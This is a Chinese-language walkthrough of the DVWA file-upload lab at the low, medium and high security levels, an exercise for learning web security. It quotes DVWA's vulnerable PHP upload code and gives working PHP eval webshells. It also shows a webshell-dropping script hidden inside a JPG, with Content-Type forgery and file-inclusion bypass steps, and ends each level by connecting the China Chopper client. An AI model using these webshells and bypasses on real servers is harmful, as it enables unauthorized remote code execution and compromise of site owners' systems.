dvwa之File Upload

dvwa之File Upload

File Upload之low等级没有任何防护

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// Can we move the file to the upload folder?
	if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
		// No
		$html .= '<pre>Your image was not uploaded.</pre>';
	}
	else {
		// Yes!
		$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
	}
}

?>

准备好一句话

<?php 

  @eval($_POST['ma']);
  echo "666666";//做个标识
  
?>

直接上传muma.php

已被解析

上菜刀

好了

File Upload之medium等级
检测content-type需要为image/jpeg 或者 image/png

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

	// Is it an image?
	if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
		( $uploaded_size < 100000 ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

?>

准备好一句话

<?php 

  @eval($_POST['ma2']);
  echo "7777777";//做个标识
  
?>

修改为Content-Type: image/jpeg,上传成功

被解析了

上菜刀

File Upload之high等级

<?php

if( isset( $_POST[ 'Upload' ] ) ) {
	// Where are we going to be writing to?
	$target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
	$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
	$html .=$_FILES['uploaded']['name'];
	$html .=basename($_FILES['uploaded']['name']);
	// File information
	$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
	$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
	$html .="itis".$uploaded_ext;
	$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
	$html .=$uploaded_size;
	$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

	// Is it an image?
	if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
		( $uploaded_size < 100000 ) &&
		getimagesize( $uploaded_tmp ) ) {

		// Can we move the file to the upload folder?
		if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
			// No
			$html .= '<pre>Your image was not uploaded.</pre>';
		}
		else {
			// Yes!
			$html .= "<pre>{$target_path} succesfully uploaded!</pre>";
		}
	}
	else {
		// Invalid file
		$html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
	}
}

?>

strrpos() 函数查找字符串在另一字符串中最后一次出现的位置。
strrpos() 函数对大小写敏感。在这里也就是匹配 . 最后一次出现的位置,然后使用**substr()**截取.后面的字符串,也就是文件后缀

getimagesize() 函数将测定任何 GIF，JPG，PNG，SWF，SWC，PSD，TIFF，BMP，IFF，JP2，JPX，JB2，JPC，XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。如果不是真的图片 就是FALSE了

因此 high等级只能老老实实上传图片了,配合文件包含漏洞才能成功利用
准备好writephpmuma.php和一张图片 121212.jpg
66677777
其中writephpuma.php内容如下,功能是创建一个php文件 并写入一句话木马,其中一句话木马的密码是mima

<?php
$mima='jpgma';
touch ("testshell.php");
$file = fopen("testshell.php","w");
$write='<?php  @eval($_POST['.$mima.']); ?>';
echo fwrite($file,$write);
fclose($file);
?>

把writephpmuma.php藏到图片121212.jpg里,生成writephpmuma.jpg

查看一下writephpmuma.jpg,已经写进去了

上传writephpmuma.jpg

访问一下

使用文件包含去包含上传的writephpmuma.jpg(会被当作php解析),这里得在php.ini文件中设置允许远程文件包含allow_url_include=On

在文件包含的目录下生成了一句话木马testshell.php

生成的testshell.php内容如下

访问一下,被解析了

上菜刀


dvwa之文件上传 结束